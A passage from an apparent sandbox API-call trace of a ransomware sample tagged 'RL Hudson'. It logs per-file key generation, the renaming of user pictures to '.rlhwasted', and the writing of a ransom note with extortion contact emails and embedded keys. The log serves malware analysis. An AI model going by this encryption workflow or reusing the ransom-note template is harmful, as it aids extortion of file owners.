67146@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]m1mJOWibR3OfYbVjMMxXryZl/vrOIL9B8rS4q4KwuFvEzAYV5M8hlKSnDfSGDdQN\r\nmQ1jlF86mUot+xlTNIPiH9VHXTFNvTglQNJPX/t7zXj071Eo34kIjpkU8Q/A8Xpn\r\nInO8NAPkciJ3Va+ofoeyY5ldq6SKXrwFGeOIHyJy2m+fWRtM5a2/usHmYmzVX01e\r\nRM6UoRCOpchkQGG5kP+oX3+drrc5+g7zYB2p0ygDqKn/T8/tl/VVlMs6T29Bc49D\r\nOG4nkFACwQc4/55FGX2gneyLq8CMyu1dVmthpK47Eqndcx6Ui0BfSJOZwmIDmyZZ\r\nqPY8/dl8skUU4og7urXd6fk9tjHoItxPc+dE+fXUnIoBH4PyA5bVLXEwAqlTvd6C\r\ndTaimEs+byvpAJt/SkuwV76aZGawXpUiW/rso4iPLt5HCN82bzPpJlA1ccTHohC9\r\niWe/jHJRyygs78cPZ3b7XqpUA1P/e7cu9d4FNpfob3pLR8s5fH/dycAtX7meIsGS\r\no9+eApPbxs1kEur7bwEvRROhr4tZXX1RBUUe1lsi4fBvwZqdzo32mcoBS+8qQJlc\r\nauQM3yaJbn0l8xVlng++cD8K3LUStOeqniS2d0o6pDnyTN5HCefC7Y1cr8QOQfpT\r\nzWcXpNM9JWCudsq0uLHlg1nEOY9C8MSud6O8xgbm+Mn=[end_key]\r\nKEEP IT\r\n") returned 981 [0196.655] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6d5420 | out: hHeap=0x6b0000) returned 1 [0196.655] WriteFile (in: hFile=0x124, lpBuffer=0x703f50*, nNumberOfBytesToWrite=0x7aa, lpNumberOfBytesWritten=0x12afef8, lpOverlapped=0x0 | out: lpBuffer=0x703f50*, lpNumberOfBytesWritten=0x12afef8*=0x7aa, lpOverlapped=0x0) returned 1 [0196.656] SetEndOfFile (hFile=0x124) returned 1 [0196.658] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x703f50 | out: hHeap=0x6b0000) returned 1 [0196.658] CloseHandle (hObject=0x124) returned 1 [0196.660] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6d4580 | out: hHeap=0x6b0000) returned 1 [0196.660] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x7061e0 | out: hHeap=0x6b0000) returned 1 [0196.660] _aulldvrm () returned 0x0 [0196.660] CryptAcquireContextW (in: phProv=0x12afecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afecc*=0x6f6f98) returned 1 [0196.661] CryptGenRandom (in: hProv=0x6f6f98, dwLen=0x48, pbBuffer=0x12aff08 | out: pbBuffer=0x12aff08) returned 1 [0196.661] CryptReleaseContext (hProv=0x6f6f98, dwFlags=0x0) returned 1 [0196.661] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\VvYGyUs\\FAv3Z8.bmp") returned 61 [0196.661] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x284) returned 0x6d4580 [0196.661] lstrcpyW (in: lpString1=0x6d45fa, lpString2=".rlhwasted_info" | out: lpString1=".rlhwasted_info") returned=".rlhwasted_info" [0196.661] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0xa34) returned 0x703f50 [0196.661] CryptAcquireContextW (in: phProv=0x12afea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afea8*=0x6f6f98) returned 1 [0196.662] CryptGenRandom (in: hProv=0x6f6f98, dwLen=0xa34, pbBuffer=0x703f50 | out: pbBuffer=0x703f50) returned 1 [0196.662] CryptReleaseContext (hProv=0x6f6f98, dwFlags=0x0) returned 1 [0196.662] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\VvYGyUs\\FAv3Z8.bmp.rlhwasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\vvygyus\\fav3z8.bmp.rlhwasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x124 [0196.676] WriteFile (in: hFile=0x124, lpBuffer=0x703f50*, nNumberOfBytesToWrite=0xa34, lpNumberOfBytesWritten=0x12afec4, lpOverlapped=0x0 | out: lpBuffer=0x703f50*, lpNumberOfBytesWritten=0x12afec4*=0xa34, lpOverlapped=0x0) returned 1 [0196.682] SetEndOfFile (hFile=0x124) returned 1 [0196.682] SetFilePointer (in: hFile=0x124, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0196.682] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x703f50 | out: hHeap=0x6b0000) returned 1 [0196.682] lstrcpyW (in: lpString1=0x6d45fa, lpString2=".rlhwasted" | out: lpString1=".rlhwasted") returned=".rlhwasted" [0196.682] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\VvYGyUs\\FAv3Z8.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\vvygyus\\fav3z8.bmp"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\VvYGyUs\\FAv3Z8.bmp.rlhwasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\vvygyus\\fav3z8.bmp.rlhwasted")) returned 1 [0196.683] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\VvYGyUs\\FAv3Z8.bmp.rlhwasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\vvygyus\\fav3z8.bmp.rlhwasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x108 [0196.683] CreateFileMappingW (hFile=0x108, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x128 [0196.683] GetFileSize (in: hFile=0x108, lpFileSizeHigh=0x12afe94 | out: lpFileSizeHigh=0x12afe94*=0x0) returned 0x1655c [0196.684] MapViewOfFile (hFileMappingObject=0x128, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x1655c) returned 0xb00000 [0196.684] CloseHandle (hObject=0x108) returned 1 [0196.688] UnmapViewOfFile (lpBaseAddress=0xb00000) returned 1 [0196.688] CloseHandle (hObject=0x128) returned 1 [0196.688] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x200) returned 0x6efa80 [0196.688] CryptAcquireContextW (in: phProv=0x12afe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afe84*=0x6f6f10) returned 1 [0196.689] CryptGenRandom (in: hProv=0x6f6f10, dwLen=0x1b8, pbBuffer=0x6efac8 | out: pbBuffer=0x6efac8) returned 1 [0196.689] CryptReleaseContext (hProv=0x6f6f10, dwFlags=0x0) returned 1 [0196.689] CryptAcquireContextW (in: phProv=0x12afbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afbec*=0x6f6f10) returned 1 [0196.690] CryptGenRandom (in: hProv=0x6f6f10, dwLen=0x200, pbBuffer=0x12afc08 | out: pbBuffer=0x12afc08) returned 1 [0196.690] CryptReleaseContext (hProv=0x6f6f10, dwFlags=0x0) returned 1 [0196.700] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x403) returned 0x6e8978 [0196.700] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6efa80 | out: hHeap=0x6b0000) returned 1 [0196.700] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0xa34) returned 0x703f50 [0196.700] _snwprintf (in: _Dest=0x703f50, _Count=0x51a, _Format="RL Hudson\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 84550@PROTONMAIL.CH | 67146@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="RL Hudson\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 84550@PROTONMAIL.CH | 67146@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]fViUVjvpmm/aZNWWxkCEIbm0KZ3/i30O8qSCLuMwTpejQ3Owdh4/8RqLUyndY4Yn\r\n/3WNfBMhdYDX/Pxhum5Cmfo0nuEW/hLgahwSPYipUML3L/sxTJlriVRH/1GsYB3G\r\n5BTHqj+XGW6aGDKNyXp+GpbsygCgWUTPLehacJ86AYTyarho9QqlMij4GljD2LBi\r\nF1cTVkGXAuWSQHwQ0IvxnOSlNGiHnHlyLE3R8/33rpSr3UfZW+ZKMSRN7eyHEiiG\r\nOvA9Kzn7WbB2Nb9Xpi/5EBUTtovxUlWXDDJWyjwADOtviZBpxHxqkkmCZQpzTNd6\r\nfa4+f6kSHGgtr3f4hivZnkrSGoTmc8u0jk/14/8ZGwE90T3gVOW8GIzeDpfXMcnc\r\nWfJ8Dwi4o0g8Iq4eqymzNmeyVTN6FQ7iBlnjYu8it8kE46HlZUZmjNGs95iWdbGY\r\nwf3yYz67XA496lNwkRmhN3jPE31iXr8ZjE8D7csJKMz8J4q5ZqLgKXjQ4/k47VZV\r\nIqSE+S5Gx/8m8RIwL2gT87tLmUY8yU3lwFNz5XHsDqtgNiGJphqKPElNIMUkKA06\r\nld4+kEa/ztLchkXT/UROxPsIBfNFz4D3tDY4w+3B1xXH9IZRXJtR882Hob44OOSu\r\ngKNPW99L0Szc26s9e3VO87Qn/JiurONIsMGrsaAJnnk=[end_key]\r\nKEEP IT\r\n") returned 981 [0196.700] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6e8978 | out: hHeap=0x6b0000) returned 1 [0196.700] WriteFile (in: hFile=0x124, lpBuffer=0x703f50*, nNumberOfBytesToWrite=0x7aa, lpNumberOfBytesWritten=0x12afef8, lpOverlapped=0x0 | out: lpBuffer=0x703f50*, lpNumberOfBytesWritten=0x12afef8*=0x7aa, lpOverlapped=0x0) returned 1 [0196.701] SetEndOfFile (hFile=0x124) returned 1 [0196.703] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x703f50 | out: hHeap=0x6b0000) returned 1 [0196.703] CloseHandle (hObject=0x124) returned 1 [0196.705] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6d4580 | out: hHeap=0x6b0000) returned 1 [0196.705] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6f9a10 | out: hHeap=0x6b0000) returned 1 [0196.705] _aulldvrm () returned 0x0 [0196.705] CryptAcquireContextW (in: phProv=0x12afecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afecc*=0x6f6f10) returned 1 [0196.706] CryptGenRandom (in: hProv=0x6f6f10, dwLen=0x48, pbBuffer=0x12aff08 | out: pbBuffer=0x12aff08) returned 1 [0196.706] CryptReleaseContext (hProv=0x6f6f10, dwFlags=0x0) returned 1 [0196.706] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\VvYGyUs\\HjHwDkQQj2MMci.bmp") returned 69 [0196.706] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x294) returned 0x6d4580 [0196.706] lstrcpyW (in: lpString1=0x6d460a, lpString2=".rlhwasted_info" | out: lpString1=".rlhwasted_info") returned=".rlhwasted_info" [0196.706] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0xa34) returned 0x703f50 [0196.706] CryptAcquireContextW (in: phProv=0x12afea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afea8*=0x6f6f10) returned 1 [0196.707] CryptGenRandom (in: hProv=0x6f6f10, dwLen=0xa34, pbBuffer=0x703f50 | out: pbBuffer=0x703f50) returned 1 [0196.707] CryptReleaseContext (hProv=0x6f6f10, dwFlags=0x0) returned 1 [0196.707] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\VvYGyUs\\HjHwDkQQj2MMci.bmp.rlhwasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\vvygyus\\hjhwdkqqj2mmci.bmp.rlhwasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x124 [0196.708] WriteFile (in: hFile=0x124, lpBuffer=0x703f50*, nNumberOfBytesToWrite=0xa34, lpNumberOfBytesWritten=0x12afec4, lpOverlapped=0x0 | out: lpBuffer=0x703f50*, lpNumberOfBytesWritten=0x12afec4*=0xa34, lpOverlapped=0x0) returned 1 [0196.709] SetEndOfFile (hFile=0x124) returned 1 [0196.710] SetFilePointer (in: hFile=0x124, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0196.710] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x703f50 | out: hHeap=0x6b0000) returned 1 [0196.710] lstrcpyW (in: lpString1=0x6d460a, lpString2=".rlhwasted" | out: lpString1=".rlhwasted") returned=".rlhwasted" [0196.710] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\VvYGyUs\\HjHwDkQQj2MMci.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\vvygyus\\hjhwdkqqj2mmci.bmp"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\VvYGyUs\\HjHwDkQQj2MMci.bmp.rlhwasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\vvygyus\\hjhwdkqqj2mmci.bmp.rlhwasted")) returned 1 [0196.711] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\VvYGyUs\\HjHwDkQQj2MMci.bmp.rlhwasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\vvygyus\\hjhwdkqqj2mmci.bmp.rlhwasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0196.711] CreateFileMappingW (hFile=0x128, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x108 [0196.711] GetFileSize (in: hFile=0x128, lpFileSizeHigh=0x12afe94 | out: lpFileSizeHigh=0x12afe94*=0x0) returned 0x314a [0196.711] MapViewOfFile (hFileMappingObject=0x108, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x314a) returned 0x6a0000 [0196.711] CloseHandle (hObject=0x128) returned 1 [0196.713] UnmapViewOfFile (lpBaseAddress=0x6a0000) returned 1 [0196.713] CloseHandle (hObject=0x108) returned 1 [0196.714] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x200) returned 0x6efa80 [0196.714] CryptAcquireContextW (in: phProv=0x12afe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afe84*=0x6f6f10) returned 1 [0196.714] CryptGenRandom (in: hProv=0x6f6f10, dwLen=0x1b8, pbBuffer=0x6efac8 | out: pbBuffer=0x6efac8) returned 1 [0196.714] CryptReleaseContext (hProv=0x6f6f10, dwFlags=0x0) returned 1 [0196.714] CryptAcquireContextW (in: phProv=0x12afbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afbec*=0x6f4f10) returned 1 [0196.715] CryptGenRandom (in: hProv=0x6f4f10, dwLen=0x200, pbBuffer=0x12afc08 | out: pbBuffer=0x12afc08) returned 1 [0196.715] CryptReleaseContext (hProv=0x6f4f10, dwFlags=0x0) returned 1 [0196.724] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x403) returned 0x6e8978 [0196.724] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6efa80 | out: hHeap=0x6b0000) returned 1 [0196.724] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0xa34) returned 0x703f50 [0196.724] _snwprintf (in: _Dest=0x703f50, _Count=0x51a, _Format="RL Hudson\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 84550@PROTONMAIL.CH | 67146@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="RL Hudson\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 84550@PROTONMAIL.CH | 67146@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]WSZCnBOPL3RI/NOdrKHEx+VIzu8lbPxxRJCIZYFB4MOs+tq8h74LugzYaNb+kdy7\r\nJvYaaJGWzEzV4vdNQABVHwZAlN2dGs9Ud219NktIqPogJgfF8/gpfg1hpYFwrChc\r\nsGw5sfLXHh7bDUAkKrxitDGjwzDfVsQiSD2ueXNxRnZfBuGWH2NI/LhAB1f0Pk7C\r\nk9TNs3mnsOZp0mOBgdNkL9Ew/oa17NWnPsykTL8Pa+lkhJlqNRUsRNKfjYEzcUXM\r\nYob0jSFT6COr4MR2WiK9S3C166Q0LSHDE4rzxPWm1klZGu60QWltQcIbmUsBT5LY\r\ne/nw3Wz21aZm/7KYAK5UQkUmZxuU38/Zmgh7eMcpbNce8aX0iDHhgWeL6h2cXUsY\r\ncj0vxYKOYzwBmtiiMlCcid4wp4gq30AMn+urQC55FPxsHPiSqYxg5jpdq6hpqXt2\r\nxQcM3reQeUFOPUhuqb4+nEt+AdJy6uiwoWcFdYFtge3CzgL0O9DNzL4xxyaXg+xJ\r\nt8SC74Ee5fRyI/QtLydeBNPySfcYZ2YnnEsrpD4CJol1cNQKOpZIcfjZ/VTVyN/F\r\n0Oj3SbkZEqY5nrsvzQXKJGYdC/LBd0sOzWl9BnoL9zjhSPJ8A5OfxEDrissJRHZd\r\nNiG7mpNF8snJzHvHsrsOyJfj9+YvB2B6Em8hRr9j9Rt=[end_key]\r\nKEEP IT\r\n") returned 981 [0196.724] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6e8978 | out: hHeap=0x6b0000) returned 1 [0196.724] WriteFile (in: hFile=0x124, lpBuffer=0x703f50*, nNumberOfBytesToWrite=0x7aa, lpNumberOfBytesWritten=0x12afef8, lpOverlapped=0x0 | out: lpBuffer=0x703f50*, lpNumberOfBytesWritten=0x12afef8*=0x7aa, lpOverlapped=0x0) returned 1 [0196.724] SetEndOfFile (hFile=0x124) returned 1 [0196.758] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x703f50 | out: hHeap=0x6b0000) returned 1 [0196.758] CloseHandle (hObject=0x124) returned 1 [0196.760] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6d4580 | out: hHeap=0x6b0000) returned 1 [0196.760] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x70b0d0 | out: hHeap=0x6b0000) returned 1 [0196.760] _aulldvrm () returned 0x0 [0196.760] CryptAcquireContextW (in: phProv=0x12afecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afecc*=0x6f4f10) returned 1 [0196.761] CryptGenRandom (in: hProv=0x6f4f10, dwLen=0x48, pbBuffer=0x12aff08 | out: pbBuffer=0x12aff08) returned 1 [0196.761] CryptReleaseContext (hProv=0x6f4f10, dwFlags=0x0) returned 1 [0196.761] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\VvYGyUs\\ktCYY.bmp") returned 60 [0196.761] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x282) returned 0x6d4580 [0196.761] lstrcpyW (in: lpString1=0x6d45f8, lpString2=".rlhwasted_info" | out: lpString1=".rlhwasted_info") returned=".rlhwasted_info" [0196.761] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0xa34) returned 0x703f50 [0196.761] CryptAcquireContextW (in: phProv=0x12afea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afea8*=0x6f6f10) returned 1 [0196.762] CryptGenRandom (in: hProv=0x6f6f10, dwLen=0xa34, pbBuffer=0x703f50 | out: pbBuffer=0x703f50) returned 1 [0196.762] CryptReleaseContext (hProv=0x6f6f10, dwFlags=0x0) returned 1 [0196.762] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\VvYGyUs\\ktCYY.bmp.rlhwasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\vvygyus\\ktcyy.bmp.rlhwasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x124 [0196.762] WriteFile (in: hFile=0x124, lpBuffer=0x703f50*, nNumberOfBytesToWrite=0xa34, lpNumberOfBytesWritten=0x12afec4, lpOverlapped=0x0 | out: lpBuffer=0x703f50*, lpNumberOfBytesWritten=0x12afec4*=0xa34, lpOverlapped=0x0) returned 1 [0196.763] SetEndOfFile (hFile=0x124) returned 1 [0196.763] SetFilePointer (in: hFile=0x124, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0196.763] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x703f50 | out: hHeap=0x6b0000) returned 1 [0196.763] lstrcpyW (in: lpString1=0x6d45f8, lpString2=".rlhwasted" | out: lpString1=".rlhwasted") returned=".rlhwasted" [0196.764] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\VvYGyUs\\ktCYY.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\vvygyus\\ktcyy.bmp"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\VvYGyUs\\ktCYY.bmp.rlhwasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\vvygyus\\ktcyy.bmp.rlhwasted")) returned 1 [0196.764] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\VvYGyUs\\ktCYY.bmp.rlhwasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\vvygyus\\ktcyy.bmp.rlhwasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0196.764] CreateFileMappingW (hFile=0x128, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x108 [0196.765] GetFileSize (in: hFile=0x128, lpFileSizeHigh=0x12afe94 | out: lpFileSizeHigh=0x12afe94*=0x0) returned 0xe98b [0196.765] MapViewOfFile (hFileMappingObject=0x108, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xe98b) returned 0x6a0000 [0196.765] CloseHandle (hObject=0x128) returned 1 [0196.768] UnmapViewOfFile (lpBaseAddress=0x6a0000) returned 1 [0196.768] CloseHandle (hObject=0x108) returned 1 [0196.768] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x200) returned 0x6efa80 [0196.768] CryptAcquireContextW (in: phProv=0x12afe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afe84*=0x6f6f10) returned 1 [0196.769] CryptGenRandom (in: hProv=0x6f6f10, dwLen=0x1b8, pbBuffer=0x6efac8 | out: pbBuffer=0x6efac8) returned 1 [0196.769] CryptReleaseContext (hProv=0x6f6f10, dwFlags=0x0) returned 1 [0196.769] CryptAcquireContextW (in: phProv=0x12afbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afbec*=0x6f6f10) returned 1 [0196.770] CryptGenRandom (in: hProv=0x6f6f10, dwLen=0x200, pbBuffer=0x12afc08 | out: pbBuffer=0x12afc08) returned 1 [0196.770] CryptReleaseContext (hProv=0x6f6f10, dwFlags=0x0) returned 1 [0196.778] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x403) returned 0x6e8978 [0196.778] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6efa80 | out: hHeap=0x6b0000) returned 1 [0196.778] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0xa34) returned 0x703f50 [0196.778] _snwprintf (in: _Dest=0x703f50, _Count=0x51a, _Format="RL Hudson\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 84550@PROTONMAIL.CH | 67146@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="RL Hudson\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 84550@PROTONMAIL.CH | 67146@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]Jbw6n82GwMY6JkmNcDpF6nob4Ad1JXi4RLLP+cwjCOKpgPGZpNnRhIaRf0jqH+Fz\r\naM5I6Gl1/V+yao4kGkRNi5o9F/y7XkziekCpp61BilXJaUoNjggNHEY/FJw4s+oT\r\nfo8eidzP0BZTp0RN+weRnouHc+zOEY2BstSAfGm7NBXwHuug4T9kKvV85fQ+pXcf\r\nplwWvSJxR0bB2JcWvmKJtRYaSiV+XWRjQ029MPwYxMZHzLuwZ7bcVdewV9fSCSAh\r\npVIrdQJOLMSXsRpTGYk6xnH/jfFst/hNEKcRPG79LK7zv5UsID1P/ZQhQhBqHP8i\r\nddQ9+HKQiYGYYXYu0GaYn6uKKPRxHt+9nbOaBfHNm43lXSEdJjxJHcyw0hqWLzDc\r\nlmP4IBZamHkjWv8vAW/Yw04ErJlSojrdZYfd18RO+ds2pxowb5XnwJfw/Uwnj7JZ\r\nl3ysYW5XIfjAvG5VnVSV/i0nQ5fC0NTMjOD+gNzOrG2zMRaN3unlA9MvZ19OAq8X\r\nldbxpUE/5mhzH76SnMvEpDWrfqo1YC03I6UUQIAnCDUpBNfpkqUweM9gdA11293p\r\nDxlU07k/ZFGoKhQmIqSPW2HRD+z8xvkJCKUkslJaBnKFg9hJEgGbv1fSysjf4XBk\r\ndBCTzXTXZ8qRPd3TlJWjrNl2d+fssBwIftWPodiqa3C=[end_key]\r\nKEEP IT\r\n") returned 981 [0196.778] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6e8978 | out: hHeap=0x6b0000) returned 1 [0196.778] WriteFile (in: hFile=0x124, lpBuffer=0x703f50*, nNumberOfBytesToWrite=0x7aa, lpNumberOfBytesWritten=0x12afef8, lpOverlapped=0x0 | out: lpBuffer=0x703f50*, lpNumberOfBytesWritten=0x12afef8*=0x7aa, lpOverlapped=0x0) returned 1 